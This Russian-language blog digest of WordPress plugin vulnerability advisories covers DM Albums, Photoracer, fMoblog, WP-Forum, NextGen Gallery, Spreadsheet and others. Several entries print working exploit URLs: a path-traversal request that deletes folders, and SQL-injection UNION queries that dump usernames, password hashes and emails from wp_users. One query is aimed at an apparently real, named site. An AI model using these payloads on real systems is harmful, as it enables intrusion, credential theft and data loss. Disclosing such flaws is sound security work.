Уязвимость в плагине WordPress DM Albums 2.x
Найдена уязвимость в плагине WordPress DM Albums 2.x, которая позволяет провести XSS-атаку против вашего блога и получить доступ к файловой системе, с возможностью удаления папок. Из-за ошибки при проверке входных данных в параметре "delete_album" сценарием dm-albums/wp-dm-albums-ajax.php. Атакующий может удалить папки извне root директории альбомов. Эксплоит: http://someblogsite/wp-content/plugins/dm-albums/wp-dm-albums-ajax.php?delete_album=../../../public_htm Плагин обновлен 23.10.2009, с этим обновлением, исправлена и уязвимость, читать далее ..
Уязвимость WordPress плагина DM Albums
В WordPress плагине DM Albums найдена уязвимость, которая позволяет злоумышленнику удаленно выполнить произвольный PHP файл на сервере жертвы. Уязвимость возникла в связи с небезопасной обработкой входящих данных, в переменной SECURITY_FILE в файле album.php. Благодаря этой уязвимости, может быть выполнен любой PHP файл, на системе жертвы, с правами доступа Web-сервера. Подробнее о уязвимости.
Уязвимость WordPress плагина Photoracer 1.0
В плагине Photoracer 1.0 найдена уязвимость типа SQL-injection, которая позволяет злоумышленнику выполнить любые команды в базе данных WordPress блога. Данная уязвимость обеспечивается недостаточной обработкой данных, которые передаются скрипту viewimg.php. С помощью такого запроса, можно выполнять команды к базе данных: http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8-- Рекомендуется отключить плагин, до исправления ошибки или выхода новой версии.
Уязвимость WordPress плагина fMoblog 2.1
Найдена уязвимость в WordPress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных WordPress. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id». Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. # Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- # Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group _concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
Уязвимость WordPress плагина WP-Forum 1.7.8
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «thread» сценарием forum_feed.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Эксплоит: http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL] http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в WordPress-плагинах Media Holder и E-Commerce. На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога. Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп. Плагин e-Commerce используется для создания интернет-магазина на основе вашего WordPress-блога. Уязвимость в плагине WordPress Media Holder связана с ошибкой читать далее ..
Уязвимость SQL-инъекции в плагине WP Comment Remix
Найдена уязвимость в плагине WordPress - WP Comment Remix. Плагин предназначается для улучшения функций комментирования. Позволяет добавить функции цитирования и ответа на комментарии. На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как: Настройки блога и активные плагины Список пользователей блога Список администраторов блога Сам эскплоит можно скачать читать далее ..
Уязвимости в Contact Form ][ для WordPress
Найдена уязвимость в плагинах контактной формы WordPress - Contact Form версии 2.0.13 и ниже. Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта. Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам читать далее ..
XSS уязвимость плагина Nextgen gallery
В плагине Nextgen Gallery, версии <= 0.96 была найдена уязвимость XSS Злоумышленник, может без авторизации использовать следующий скрипт: http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery Насколько известно, исправлений в данный момент не существует.
Уязвимость в плагине WordPress Spreadsheet 0.6
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ss_id» сценарием ss_load.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Эксплоит: http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+ (1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email), 3,4+from+wp_users--&display=plain
